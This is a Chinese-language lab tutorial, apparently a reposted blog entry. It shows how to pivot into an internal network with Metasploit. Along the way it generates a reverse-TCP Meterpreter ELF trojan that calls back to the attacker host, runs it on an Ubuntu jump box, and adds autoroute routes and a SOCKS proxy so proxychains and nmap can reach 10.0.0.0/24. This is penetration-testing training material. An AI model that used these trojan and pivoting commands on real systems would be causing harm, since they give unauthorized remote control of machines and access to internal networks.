当前位置:   article > 正文

msf添加路由及socks代理进行内网穿透_msf内网代理

msf内网代理

前言

前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问

一、实验目的

当我们通过msf拿到一台边缘vps时,可以在msf中添加路由开启socks代理实现内网的访问

二、实验环境

跳板机ubuntu:10.0.0.3、192.168.145.205

目标机器win7:10.0.0.2

攻击机kali:192.168.145.171

网卡的配置上一篇有说过 我在这里,这里就不再赘述了

三、实验过程

首先我们用msfvemon制作一个木马,要使用reverse_tcp反向连接,因为正向连接可能会被防火墙阻挡。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.145.171 lport=4444 -f elf >/home/wlw666/桌面/hhh.elf

然后我们开启msf,使用exploit/multi/handler模块

use exploit/multi/handler

设置payload,lhost,lport

set paylod linux/x86/meterpreter/reverse_tcp

然后run即可,可以看到显示正在等待连接

此时把我们的木马拖进跳板机里面,因为这次我们的跳板机是linux的ubuntu,所以一开始木马是没有执行权限的,我们先添加执行权限,+x的意思是赋予执行权限。

chmod +x hhh.elf

然后查看一下,确实被赋予了执行权限

然后我们执行木马程序

可以看到我们kali这边已经上线了ubuntu,拿到了meterpreter

现在我们来添加路由,输入命令查看当前添加的路由,啥也没有

run autoroute -p

输入命令添加路由,因为ubuntu的内网网段为10.0.0.1嘛,所以就添加它为路由就行了。添加路由就是告诉msf下一步要去哪里,可以理解为把10.0.0.1当成网关了,下一步把流量转发到那里,从而实现内网的访问。

run autoroute -s 10.0.0.1/24

此时我们再看一下,已经成功添加了,但是这个路由只能msf用。要是我们想用nmap来探测内网的信息就还需开启socks代理

输入命令搜索socks模块,使用第0个socks代理服务模块

然后看使用参数,srvhost设置为0.0.0.0或者127.0.0.1都行,意思是转发本地流量,srvport为转发端口可更改可不改,version为socks版本,4或者5都行。最后直接run就行

run之后会生成一个job,可以输入jobs查看

然后再来配置一下socks代理,输入命令打开配置文件

vim /etc/proxychains.conf

输入代理类型,ip地址还有代理端口,照着抄上面的就行了

最后扫描一下位于内网的机器,也就是10.0.0.2,记得加上proxychains

扫描结果

四、结语

以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/391843
推荐阅读
相关标签
  

闽ICP备14008679号